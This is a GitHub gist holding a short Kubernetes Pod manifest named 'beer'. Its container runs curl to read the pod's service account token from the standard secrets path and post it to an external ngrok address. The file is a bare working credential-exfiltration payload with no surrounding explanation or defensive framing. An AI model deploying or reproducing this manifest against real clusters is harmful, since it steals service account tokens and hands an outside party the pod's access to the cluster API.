Created
January 18, 2020 16:52
-
-
Save kingdonb/d97b0fa1689ba6e6f75e65fe462c78b2 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: v1 | |
kind: Pod | |
metadata: | |
name: beer | |
spec: | |
containers: | |
- name: beer | |
image: tutum/curl | |
command: | |
- sh | |
- -c | |
- 'curl -d token=$(cat var/run/secrets/kubernetes.io/serviceaccount/token) http://dc05af0c.ngrok.io' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment